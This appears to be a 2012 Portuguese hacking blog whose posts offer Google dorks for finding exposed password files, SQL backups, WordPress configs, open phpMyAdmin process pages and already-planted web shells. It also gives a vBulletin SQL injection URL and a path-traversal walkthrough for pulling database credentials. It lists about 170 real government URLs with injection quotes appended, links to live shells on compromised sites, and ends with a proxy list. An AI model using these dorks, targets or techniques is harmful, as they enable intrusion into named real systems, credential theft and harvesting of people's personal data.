Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador dorks. Mostrar todas as postagens
Mostrando postagens com marcador dorks. Mostrar todas as postagens

domingo, 14 de outubro de 2012

Dork busca backup mysql

Dork busca backup mysql


Dessa vez estou postando uma dork que vai explore desde erros de SQL á Backup SQL dentro de servidores.

Devido a sintax inurl "intext:(insert|set)" o google vai procurar dentro do arquivo .mysql esses termos um ou outro, Assim expondo arquivos de bk dando um conhecimento da estrutura do site alvo.

Dork: intext:(insert|set) ext:mysql



Mais dorks mais dorks.


Dorks vai aé algumas..

"admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
"powered by ducalendar" -site:duware.com
"Powered by Duclassified" -site:duware.com
"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"
"powered by duclassmate" -site:duware.com
"Powered by Dudirectory" -site:duware.com
"powered by dudownload" -site:duware.com
"Powered By Elite Forum Version *.*"
"Powered by Link Department"
"sets mode: +k"
"your password is" filetype:log
"Powered by DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target[*]" -sample -cvs -example
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:”WINVNC3”
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt";)
filetype:sql ("passwd values" | "password values" | "pass values" )
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetypels username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 {:content:}quot;
intext:"powered by EZGuestbook"
intext:"powered by Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica

sábado, 13 de outubro de 2012

Dork explorando PhpMysqlAdmin

Dork explorando PhpMysqlAdmin



Dork explorando PhpMysqlAdmin

Vamos procurar por paginas que contenham o titulo phpmyadmin que de comum é gerenciamento ou tutoriais, Hoje como essa dork ou variantes dela é pouco conhecida então vamos ter um resultado mais limpo.

Procurado pelo termo na url "server_processlist.php"
Acesso gerenciamento de processo do painel,
Ex:


Truncate Shown Queries ID User Host Database Command Time Status SQL query
Kill 5699193 rewppupr1 localhost:45324 None Query 0 --- SHOW FULL PROCESSLIST
Algo do tipo.
Agora muito perguntam que eu faço com isso pode criar paginas HTML dentro, pode criar uma nova noticia com link de sua escolha, vai da sua técnica.


De inicio algums servers não mostraram seus bancos ou tabelas então procure pela aba SQL = Executar comandos sql aé ja sabe o leque de possibilidades abre muito mais ainda.

Dork: intitle:phpmyadmin inurl:server_processlist.php

Variante para limpar domínios

Add o site:domínio

Dork: site:br intitle:phpmyadmin inurl:server_processlist.php

domingo, 7 de outubro de 2012

Dork buscando arquivo confg do wordpress

Dork buscando arquivo confg do wordpress


Aé vai um dork simples que busca vulnerabilidades alias ele busca arquvios de configuração do banco de dados, o que criei e uma variante da dork que encontrei na net que seria esse : "inurl:wp-config.txt" ela é muito fechada pois o Google fica sem opção referente a variantes do arquivo wp-config adicionei o * para capturar outros tipos de wp-config e o comando ext pra determinar a extensão do arquivo.

O arquivo de nome: wp-config.txt

Dork: inurl:wp-config* ext:txt

quarta-feira, 26 de setembro de 2012

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Um bug no Vbulletin (blog_plugin_useradmin) v4.1.12 que aquele velhoooo sql injection.

Aé vai o dork né!

Dork: site:domínio intext:"Powered By Vbulletin 4.1.12"
Ex:
site:ar intext:"Powered By Vbulletin 4.1.12"
site:br intext:"Powered By Vbulletin 4.1.12"
site:gov intext:"Powered By Vbulletin 4.1.12"

O domínio fica a sua preferencia.



Uso do exploit
 http://site/includes/blog_plugin_useradmin.php?do=usercss&u="SQL INJECTION"


quarta-feira, 29 de agosto de 2012

Explorando vulnerabilidade Fopen



Vamos falar de falhas.

Deis uma volta no Google "Uma busca avançada", percebi que 40% de alguns sites estão vulneráveis ao Attack FOPEN é algo simples e de certa forma avassalador se feito por alguém Mal-intencionado.

Referencia:

http://php.net/manual/pt_BR/function.fopen.php

Dork:

site:br inurl:download.php?file=
site:br inurl:baixar.php?arquivo=
inurl:dow.php?file= 

Só exemplos de dorks use sua criatividade.


Com Certeza alguns de vocês já fizeram algum download isso é #fato!.
Hoje vamos dar uma olhada no como o código PHP se comporta no dow.

Site ex: wwww.sitevull.com.br/baixar.php?arquivo=tutorial.pdf

O que acontece é que os GET's passados na URL estão sem validação, Assim com um simples trocar de parâmetro é possível baixar arquivos do site alvo.

ex: wwww.sitevull.com.br/baixar.php?arquivo=index.php
ex: wwww.sitevull.com.br/baixar.php?arquivo=index.html

Assim vai mais digamos, que no mesmo site você tem o seguinte cenário.

wwww.sitevull.com.br/admin

Vamos baixar o index da pasta Admin.

ex: wwww.sitevull.com.br/baixar.php?arquivo=../admin/index.php

Dentro da index Admin #fato que tem uma include ou require pra validar as informações passadas no form.

vamos dizer que encontramos no nosso alvo fictício um include para o arquivo de conexão com banco.


include("/secret/config.php");
?>

Vamos na url vulnerável e baixar o arquivo config.php

ex: wwww.sitevull.com.br/baixar.php?arquivo=../secret/config.php

Conteúdo do tipo.

        $user_site = "web_teste";
$user_site = "testepp";
$senha_site = "testeppg";
$host = "sitevull.com.br ";//IP TESTE
$conexao = mssql_connect($host,$user_site,$senha_site) or die("Erro");
$banco = "gppepe";


Pronto conseguimos acesso ao banco do site sem usar um script ou programa.

Forma errada sem validação:



Forma menos errada sem validação:



domingo, 12 de agosto de 2012

Lista com 170 site .gov possíveis brechas.

Lista com 170 site .gov possíveis brechas.


Ae vai uma lista com alguns possíveis vulneráveis.
Dorks: site:gov. +inurl:php?pageid=
Dorks: site:gov. +inurl:php?id=
Dorks: site:gov.   result +inurl:php?id=
Dorks: site:gov.    +inurl:php?item=
Dorks: site:gov.    +inurl:php?  order  =
Dorks: site:gov.    +inurl:php?  list =
Dorks: site:gov.    +inurl:php?home =
Dorks: site:gov.  home  +inurl:php?   *=
Dorks: site:gov.  home  +inurl:pag?   *=


http://xxxxxx.www.legco.gov.vg/index.php?pageid=11'
http://xxxxxx.www.stc.gov.ae/en/transport-intercity-routes-result.php?id=112'
http://xxxxxx.www.hzsq.gov.cn/view1.php?id=7543'
http://xxxxxx.wnpop.gov.cn/detailed.php?id=3474'&cat_id=6'
http://xxxxxx.www.gov.ai/ministry.php?id=2'
http://xxxxxx.www.zshda.gov.al/index.php?id=84'
http://xxxxxx.www.akbn.gov.al/index.php?id=2&menu=md&lng=en&ak=g/view_gal'
http://xxxxxx.www.cadenasdevalor.gob.ar/Fuentes/destacado.php?n=1247'
http://xxxxxx.www.villaallende.gov.ar/va_mostrar.php?id=876'
http://xxxxxx.www.sancayetano.gov.ar/deporte-turismo/info.php?id=378'&c=AAGA'
http://xxxxxx.www.diputadosmisiones.gov.ar/perfiles.php?id=5'
http://xxxxxx.www.turismo.misiones.gov.ar/ampliar.php?id=37'
http://xxxxxx.www.shootingcentre.nsw.gov.au/calendar_detail.php?id=50'&cat_id=9'
http://xxxxxx.www.buenosaires.gov.ar/areas/ciudad/historico/calendario/destacado.php?menu_id=23203'&ide=309'
http://xxxxxx.www.mocat.gov.bd/personnel.php?id=1'
http://xxxxxx.www.bsfic.gov.bd/centerCont.php?id=8'
http://xxxxxx.chr.police.gov.bd/request_entry.php?category_id=1'&lang=en'
http://xxxxxx.www.mucurici.es.gov.br/imprimir.php?id=113'
http://xxxxxx.www.secult.es.gov.br/blogs/?id=/blog.php'
http://xxxxxx.paraibuna.sp.gov.br/noticia.php?id=662'
http://xxxxxx.www.sead.pi.gov.br/album.php?id=205'
http://xxxxxx.www.crbio03.gov.br/noticias/index.php?id=4645'&idcategoria=7'
http://xxxxxx.www.juatuba.mg.gov.br/vernoticias.php?id=1'
http://xxxxxx.www.ibate.sp.gov.br/index.php?id=25'
http://xxxxxx.www.arapora.mg.gov.br/imprimir.php?id=795'
http://xxxxxx.oeiras.pi.gov.br/noticias.php?id=132'&exibe=comentarios'
http://xxxxxx.www.pmcg.ms.gov.br/egov/downloadFile.php?id=4128'&fileField=arquivo_dow'&table=downloads'&key=id_dow'&sigla_sec=fundac'
http://xxxxxx.www.iac.sp.gov.br/noticiasdetalhes.php?id=748'
http://xxxxxx.www.ade.az.gov/arizonaheat/providers/provider_information.asp?id=354'&returnP=1'
http://xxxxxx.www.bhutan.gov.bt/government/ministries.php?min_id=16'
http://xxxxxx.webhosting.redsalud.gov.cl/transparencia/public/no_aplica.php?id=AO082'&item=121'
http://xxxxxx.www.ccpitzj.gov.cn/showlink_E.php?id=23'
http://xxxxxx.www.comic.gov.cn/news_show.php?id=7738'
http://xxxxxx.www.ykzzb.gov.cn/info.php?id=162'
http://xxxxxx.www.hzsq.gov.cn/news.php?id=154'
http://xxxxxx.wnpop.gov.cn/detailed.php?id=3474'&cat_id=6'
http://xxxxxx.www.dyjy.gov.cn/articleshow.php?id=12400'
http://xxxxxx.www.meda.gov.cn/en/newsshow.php?id=1719'
http://xxxxxx.www.tchjbh.gov.cn/news_display.php?id=148'
http://xxxxxx.www.cpae.gov.co/index.php?id=7'
http://xxxxxx.www.anh.gov.co/es/index.php?id=1'
http://xxxxxx.www.bogota.gov.co/equidad/newequi.php?id=1'
http://xxxxxx.www.fineart.gov.eg/arb/cv/cv.asp?IDS=380
http://xxxxxx.www.mfa.gov.et/Press_Section/publication.php?Main_Page_Number=3311'
http://xxxxxx.www.gibraltarlaws.gov.gi/view_article_a.php?group_id=000000244'&id=000001614'
http://xxxxxx.sinit.segeplan.gob.gt/sinpet/institucionlist.php?order=CORREO_ELECTRONICO'
http://xxxxxx.www.mkeh.gov.hu/index.php?name=OE-eLibrary'&file=download'&id=4191'&keret=N'&showheader'
http://xxxxxx.regionalinvestment.bkpm.go.id/newsipid/commodity.php?ic=2'
http://xxxxxx.pustaka.litbang.deptan.go.id/eng/dilanggan.php?id=3'
http://xxxxxx.spore.cta.int/index.php?option=com_content'&task=view'&lang=en'&id=24'&catid=7'
http://xxxxxx.www.uibm.gov.it/index.php?option=com_content'&view=article'&id=2004522'&menuMainType=menuServizi'&idmenu=11691'&lang=it'
http://xxxxxx.www.tenders.go.ke/view.tender.php?id=400'
http://xxxxxx.www.nscpeace.go.ke/108/media.php?id=459'
http://xxxxxx.www.nema.go.ke/index.php?option=com_content'&view=article'&id=104'&Itemid=561'&deoid=7'
http://xxxxxx.www.cljr.gov.kh/partners/index.php?option=com_partners'&task=detail'&id=4'&Itemid='&lang=en'
http://xxxxxx.www.phnompenh.gov.kh/download_file.php?id=126440066890196'
http://xxxxxx.www.babymam.go.kr/kimson/home/jongno/bbs.php?id=preg_06'
http://xxxxxx.tour.geumsan.go.kr/_prog/_board/?code=tour_040201'&mode=V'&no=1978551'&upr_ntt_no=1978551'&site_dvs_cd=tour'&menu_dvs_cd=040205'&gubun=gubun_04'
http://xxxxxx.www.region.go.kr/news/record_read.php?id=44377'
http://xxxxxx.english.yangsan.go.kr/program/board/main/view.php?bid=eng_citynews'&id=6'&hid='
http://xxxxxx.ru.ontustik.gov.kz/category.php?id=74'
http://xxxxxx.touristguide.ncp.gov.lk/bin/things-to-see/details/index.php?id=3'
http://xxxxxx.cbl.gov.ly/en/home/details.php?id=687'
http://xxxxxx.www.npc.gov.ly/experts/list/view.php?id=1876'
http://xxxxxx.www.ccist.gov.ma/contenu.php?id=3'
http://xxxxxx.www.mscl.gov.mg/organisme/organes.php?id=1'
http://xxxxxx.ohridler.gov.mk/soo/details.php?id=15'&lang=en'
http://xxxxxx.www.macautourism.gov.mo/en/main/highlight.php?id=3'
http://xxxxxx.www.primature.gov.mr/fr/index.php?link=0'&id=1'
http://xxxxxx.www.tvet.gov.mv/newspage.php?id=2'
http://xxxxxx.www.educacion.yucatan.gob.mx/showpubli.php?id=1429'
http://xxxxxx.www.sefomec-coahuila.gob.mx/modulo10.php?id=45'
http://xxxxxx.culturacolima.gob.mx/cms/nota.php?id=1373'&autor=62'&cat=1'
http://xxxxxx.www.gobiernodigital.inah.gob.mx/mener/index.php?contentPagina=33'
http://xxxxxx.programas.jalisco.gob.mx/detallePrograma_hac.php?id=794'
http://xxxxxx.www.naucalpan.gob.mx/comunicado_completo_web.php?id=444'
http://xxxxxx.www.congresomich.gob.mx/index.php?id=271'
http://xxxxxx.portal.sre.gob.mx/chicago/popups/articleswindow.php?id=64'
http://xxxxxx.seia.guanajuato.gob.mx/panel/document/phpver.php?id=1147'
http://xxxxxx.www.mec.gov.mz/forum/forum_topico.php?id_cat=7'
http://xxxxxx.www.moe.gov.na/m_pro_projects.php?id=2'&projectid=3'
http://xxxxxx.www.jigawastate.gov.ng/contentpage.php?id=255'
http://xxxxxx.www.nass.gov.ng/nass/news.php?id=157'
http://xxxxxx.www.mem.gob.ni/index.php?s=1'&idp=174'&idt=2'&id=424'
http://xxxxxx.www.nta.gov.np/en/aboutus/index.php?id=7'
http://xxxxxx.bhaktapur.gov.np/newsdetail.php?id=157'
http://xxxxxx.www.ncasc.gov.np/news.php?id=21'
http://xxxxxx.www.dwss.gov.np/dwss-pictures.php?id=28'
http://xxxxxx.www.ird.gov.np/ird/index/document_display.php?id=18'
http://xxxxxx.www.nepalntp.gov.np/content.php?id=206'
http://xxxxxx.www.mof.gov.np/demo/en/newsroom/detail.php?id=52'
http://xxxxxx.proinvex.mici.gob.pa/index.php?option=com_content'&view=article'&id=100'&Itemid=62'&lang=en'
http://xxxxxx.www.sistemapenitenciario.gob.pa/nosotros.php?id=1'
http://xxxxxx.www.projoven.gob.pe/institucional.php?id=15'
http://xxxxxx.www.munimarcona.gob.pe/ver_notasprensa.php?id=69'
http://xxxxxx.www.inpe.gob.pe/contenidosprensa.php?id=905'&direccion=1'
http://xxxxxx.www.drtcp.gob.pe/view_deta.php?display=encuesta'&id='
http://xxxxxx.www.peru.gob.pe/transparencia/pep_transparencia_lista_planes.asp?id_entidad=13904'&id_tema=1'
http://xxxxxx.www.hospitalvitarte.gob.pe/cas.php?id=117'
http://xxxxxx.www.dole.gov.ph/list_of_holidays.php?id=95'
http://xxxxxx.archives.pia.gov.ph/wdavh2011/?m=3'&i=brazil'&sm=events'
http://xxxxxx.www.gjtmap.gov.pk/ngos/sb_bro_ngo.php?id=14'
http://xxxxxx.www.psf.gov.pk/staffdetail.php?id=10'
http://xxxxxx.multan.gov.pk/files.php?id=1'
http://xxxxxx.www.lhc.gov.pk/judges/jbiodata.php?id=132'
http://xxxxxx.profile.hec.gov.pk/?comp=registration.php'&return=des.hec.gov.pk'&param=CSEfsoNuNcdPScqen4RUk3/Y6zCjLwb6tb6XfCz9'
http://xxxxxx.www.multan.gov.pk/page.php?data=193'
http://xxxxxx.www.psf.gov.pk/abstract.php?id=5'
http://xxxxxx.www.ncsw.gov.pk/news-details.php?id=29'
http://xxxxxx.cnw.gob.pk/tenderview.php?id=19'
http://xxxxxx.www.sindhinformation.gos.pk/showpress_release.php?id=181'
http://xxxxxx.smart.ippt.gov.pl/index.php?id=research_conferences'
http://xxxxxx.fluid.ippt.gov.pl/ictam04/php/ext_www/abstract_view.php?id=1734'
http://xxxxxx.www.planonacionaldeleitura.gov.pt/clubedeleituras/download.php?s=elivros'&chave=T200en94'&id=200'
http://xxxxxx.www.seprelad.gov.py/contenido.php?id=21'
http://xxxxxx.www.sas.gov.py/xhtml/login/notisas.php?id=102'
http://xxxxxx.www.rosprom.gov.ru/snews.php?id=166'&vers=print'
http://xxxxxx.www.orinfor.gov.rw/printmedia/topstory.php?id=4258'
http://xxxxxx.tabukedu.gov.sa/ta31/send2.php?id=4605'
http://xxxxxx.www.parliament.gov.sd/en/presidents.php?id=1'
http://xxxxxx.www.pepam.gouv.sn/annuaire.php?id=95'&lang=fr'
http://xxxxxx.www.nombredejesus.gob.sv/pages/proyectos.php?id=50'
http://xxxxxx.www.sansalvador.gob.sv/comunicaciones/desc_comunicados.php?id=3'
http://xxxxxx.www.mahrukat.gov.sy/news.php?id=13'
http://xxxxxx.thailand.prd.go.th/view_around_thailand.php?id=6081'
http://xxxxxx.thainews.prd.go.th/en/news.php?id=255410140004'
http://xxxxxx.www.maerang.go.th/webboard_view.php?id=146'
http://xxxxxx.inter.mua.go.th/main2/news_detail.php?id=72'
http://xxxxxx.www.dmh.moph.go.th/news/view.asp?id=1008'
http://xxxxxx.www.ubon.go.th/dept/dtdetail.php?id=28971'
http://xxxxxx.www.sisaketedu1.go.th/nineboard/view.php?id=2877'
http://xxxxxx.www.nph.go.th/consult/nphboard/nphtopic.php?id=0000000046'
http://xxxxxx.www.oae.go.th/main.php?filename=index___EN'
http://xxxxxx.www.navy.mi.th/newwww/code/special/terminology/terminology.php?id=0'
http://xxxxxx.www.grandprix-tunis.gov.tn/en/index1.php?id=21'
http://xxxxxx.www.marchespublics.gov.tn/onmp/banniere/redirectb.php?id=810'&idb=78'&'
http://xxxxxx.www.finance.gov.tt/services.php?mid=10'
http://xxxxxx.www.tycc.gov.tw/mp_all.php?id=1'
http://xxxxxx.express.culture.gov.tw/events_detail.php?id=6761'
http://xxxxxx.tpeusar.tfd.gov.tw/inside_NewsList.php?id=71'
http://xxxxxx.tainan.cca.gov.tw/about_news_more.php?id=16'
http://xxxxxx.www.tcu.go.tz/info/news/view_news.php?id=56'
http://xxxxxx.www.marineparks.go.tz/parks_info.php?id=1'
http://xxxxxx.www.maji.go.tz/news_events/view_news_item.php?id=230'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.meac.go.tz/news_events/view_event.php?id=129'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.pmoralg.go.tz/news_events/view_news_item.php?id=385'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.vpo.go.tz/announcements/view_news_item.php?id=350'&intVariationID=1'
http://xxxxxx.www.meteo.go.tz/data.php?id=19'
http://xxxxxx.www.mem.go.tz/news_events/view_news_item.php?id=68'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.meteo.go.tz/news_events/view_event.php?id=326'
http://xxxxxx.www.tira.go.tz/news_events/view_news_item.php?id=56'
http://xxxxxx.www.zanzibarassembly.go.tz/news_events/view_event.php?id=755'&intVariationID=1'&szTitle=Current'
http://xxxxxx.www.mkurabita.go.tz/resource_centre/view_press.php?id=96'&chooselang=1'
http://xxxxxx.tender.ppra.go.tz/tender_details.php?id=4356'
http://xxxxxx.www.dabi.gov.ua/news_text.php?id=589'
http://xxxxxx.www.uaan.gov.ua/akademiki.php?id=112'
http://xxxxxx.dzz.gov.ua/CPOSI/style/page_2/templer_page2_en.php?id=2'&table=text_monitoring'
http://xxxxxx.www.unbs.go.ug/news.php?id=52'
http://xxxxxx.www.ugabif.go.ug/ncd/organisation_detail.php?id=41'
http://xxxxxx.hsc.go.ug/general/downloads.php?id=9'
http://xxxxxx.www.opm.go.ug/news.php?News_id=40'
http://xxxxxx.jlos.go.ug/page.php?p=curnews'&id=54'
http://xxxxxx.amuru.go.ug/districtprofile_category.php?id=18'
http://xxxxxx.www.mia.go.ug/pagex.php?p=news'&id=2'
http://xxxxxx.www.fonep.gob.ve/noticias.php?id=195'
http://xxxxxx.www.inzit.gob.ve/detalle_noticias.php?id=53'
http://xxxxxx.www.sisov.mpd.gob.ve/estudios/detalle.php?id=158'
http://xxxxxx.www.monteavila.gob.ve/mae/catalogo-resultado-detalle.php?id=225'
http://xxxxxx.www.fundayacucho.gob.ve/vistas/enterate.php?id=70'
http://xxxxxx.www.dpe.gov.za/home.php?id=581'
http://xxxxxx.www.mpuleg.gov.za/show.php?id=11'&menu=17'
Somente estudos.

sábado, 11 de agosto de 2012

Dork busca vulnerabilidade viewnews.php cms

Dork busca vulnerabilidade viewnews.php cms


Erro encontrado no arquivo viewnews.php
Get = id
Forçando procurar pela palavra sintaxe "Geralmenta aparece quando ocorri erro SQL"
Dork: +syntax inurl:viewnews.php?id=

sexta-feira, 10 de agosto de 2012

Busca avançada por datas especificas.

Busca avançada por datas especificas.

As vezes é um saco quando vamos fazer uma busca e aprece alguns assuntos do tempo da vovozinha.
Vou lhes mostra uma maneira de forçar nosso querido Google a busca no range desejamos.

Dork = site:br +inurl:php?id=

Data1= 8/8/2000
Data2=10/8/2000

As datas ficam nesse formato padrão &tbs=cdr:1,cd_min:Data1,cd_max:Data2

Data que deseja procurar inicio: 8/8/2000 até: 10/8/2000

Sua URL Fica assim:

https://www.google.com/search?tbs=tl:1&q=Dork&tbs=cdr:1,cd_min:Data1,cd_max:Data2

Bom proveito

Dork busca shell ja upadas

Vamos procurar Shell Script upadas em servidores invadidos


Vamos procurar Shell Script upadas em servidores invadidos


Dorks: "Safe Mode " ip: cmd ~ inurl:php  ~~Whm

Vai algumas shell que encontrei:

http://corpus-ins.lit.auth.gr/dbxx/rsrc/jquery/plugins/jquery.uploadify/command.php

http://vazio.com.br/cpanel.php?user=user&S1=%0D%0A%0D%0A

http://www.futureinnoversity.edu.in/wp-content/plugins/mm-forms/upload/temp/1342466953-sec.php?act=f&f=a.pl&ft=phpsess&white=1&d=%2Fwebcorp1%2Fwww%2Fcorpusers%2Ff%2Fu%2Ffutureinnoversity.edu.in%2Fwp-content%2Fplugins%2Fmm-forms%2Fupload%2Ftemp%2F

quinta-feira, 26 de julho de 2012

Nova dork para uma pesquisa de backup de arquivos sql

Nova dork para uma pesquisa de backup de arquivos sql


Nova dork para uma pesquisa de backup de arquivos sql com um extra pegando parâmetros sql de INSERT com campos user ou login.

Essa busca não quer dizer que tudo que achar vai ser útil ou vai te ajudar em uma invasão mais, da um conceito que devemos ter cuidado com dados de nosso clientes &  da estrutura do site.
pois um atacante pode simplesmente analisando a estrutura do bk SQL montar e um atack contra seu site.
Imagina um bk sql  e-commerce, malandros cards iriam adorar isso.



Dork: site:.br +(,user,|,login,) INSERT   ext:sql

Nova dork para busca de email list em arquivos .CSV

Nova dork para busca de email list em arquivos .CSV

Nova dork para busca de email list.


Comma-separated values (CSV), em português Valores Separados por Vírgula, é um formato de arquivo que armazena dados tabelados, cujo grande uso data da época dos mainframes. Por serem bastante simples, arquivos .csv são comuns em todas as plataformas de computador.
O CSV é um implementação particular de arquivos de texto separados por um delimitador, que usa a vírgula e a quebra de linha para separar os valores. O formato também usa as aspas em campos no qual são usados os caracteres reservados (vírgula e quebra de linha). Essa robustez no formato torna o CSV mais amplo que outros formatos digitais do mesmo segmento.

[editar]Especificação

Embora não exista uma especificação formal do formato CSV, o RFC 4180 descreve um formato comum e estabelece text/csv como um tipo MIME registrado na IANA. Formalmente, o CSV é um formato de dados delimitado que possui campos (colunas) separados por caracteres de vírgula e registros (linhas) separados por caracteres de quebra de linha. Campos que contêm caracteres especiais (vírgula, quebra de linha ou aspas) devem ser envolvidos em aspas. Entretanto, se uma linha contiver uma única entrada que seja uma cadeia vazia, ela também pode ser envolvida por aspas. Se um campo contiver um caractere de aspas, ele é discernido posicionando outro caractere igual logo em seguida. O formato CSV não requisita uma codificação de caracteres, uma ordenação de bytes ou um formato de terminador de linha.

[editar]Exemplo

1997FordE350ac, abs, moon3000.00
1999ChevyVenture "Extended Edition"4900.00
1996JeepGrand CherokeeMUST SELL!
air, moon roof, loaded
4799.00
A tabela acima pode ser ser representada em CSV da seguinte maneira:
1997,Ford,E350,"ac, abs, moon",3000.00
1999,Chevy,"Venture ""Extended Edition""",,4900.00
1996,Jeep,Grand Cherokee,"MUST SELL!
air, moon roof, loaded",4799.00

Fonte: Querido http://pt.wikipedia.org/wiki/Comma-separated_values


Alguns adm tem uma mania de fazer BKP em pastas do servidor web, até a e beleza é uma pratica comum.
Porem os mesmo esquecem de dar restrição na pasta & nosso querido bot do Google captura essas URL com até mesmo arquivo que dispõem de senhas,usuarios,smtp.
As vezes pessoas se perguntam como meus dados foram parar ali, simples pode ser que tenha se cadastrado naquele site sabe porn,video,compras enfim quem algum adm deixou seus dados expostos.
Mais nessa dork vamos busca somente list-mail.


Dork:  site:.br ext:csv  (*mail*)

terça-feira, 24 de julho de 2012

Dork para buscar proxy.

Dork para buscar proxy.

Gosta de navegar oculto na net com uma lista de proxy ??
Aé vai uma Dork que busca lista de Proxy's no Google, lista de arquivo com extensão txt

Dork: +":8080" +":3128" +":80" ext:txt

205.238.18.5:80
165.117.54.86:8080
208.238.117.8:80
24.142.102.160:3128
204.134.208.34:80
198.59.148.11:8080
209.210.176.51:80
207.154.143.114:80
207.99.255.133:8080
24.142.102.160:80
207.136.80.204:80
198.82.161.226:3128
24.112.47.107:8080
206.47.244.62:80
205.181.169.8:8080
63.71.28.2:8080
208.247.48.3:80
209.20.42.6:80
206.47.244.93:80
192.135.183.100:3128
63.89.26.6:8080
207.136.80.104:81
165.254.117.51:3128
209.130.129.216:80
24.131.128.11:8080
203.255.234.12:80
216.168.96.25:80
205.152.138.34:80
206.252.204.157:8080
206.250.201.2:3128
206.47.244.61:80
207.217.252.34:80
207.32.27.117:80
216.234.161.71:8080
216.168.96.25:8080
207.109.187.66:3128
216.79.194.45:80
204.91.54.100:80
150.176.192.3:3128
206.234.126.35:8080
206.50.19.21:8080
207.34.202.2:3128
134.50.253.11:80
168.23.160.246:8080
132.248.202.1:80
208.129.96.140:80
207.99.255.132:8080
199.176.228.108:3128
198.247.1.15:80
203.255.234.11:8080
206.30.80.136:8080
216.46.49.2:8080
205.252.37.3:80
203.255.234.11:80
209.197.15.15:3128
203.255.234.12:8080
4.18.141.3:3128
207.250.150.65:80
165.117.55.57:80
165.117.55.56:8080
216.58.100.9:3128
216.198.7.130:8080
4.18.141.3:80
205.202.64.241:8080
198.111.46.147:8080
209.58.11.227:80
209.151.160.41:8080
216.46.49.2:80
165.117.54.182:8080
195.74.96.19:80
194.144.156.250:80
206.99.218.242:80
209.136.17.244:3128
158.43.240.13:3128
158.43.240.9:3128
194.153.28.3:80
210.155.45.2:8080
207.109.187.68:3128
147.32.80.9:80
209.20.42.6:3128
168.23.160.248:8080
130.161.26.5:8080
207.34.202.2:80
165.117.55.56:80
165.117.54.183:80
12.2.122.106:80
165.117.54.183:8080
206.99.218.240:80
206.252.237.21:80
195.74.96.18:80
165.117.55.57:8080
207.99.255.131:8080
193.4.192.39:81
210.152.242.2:8080
205.181.169.8:80
207.203.248.13:80
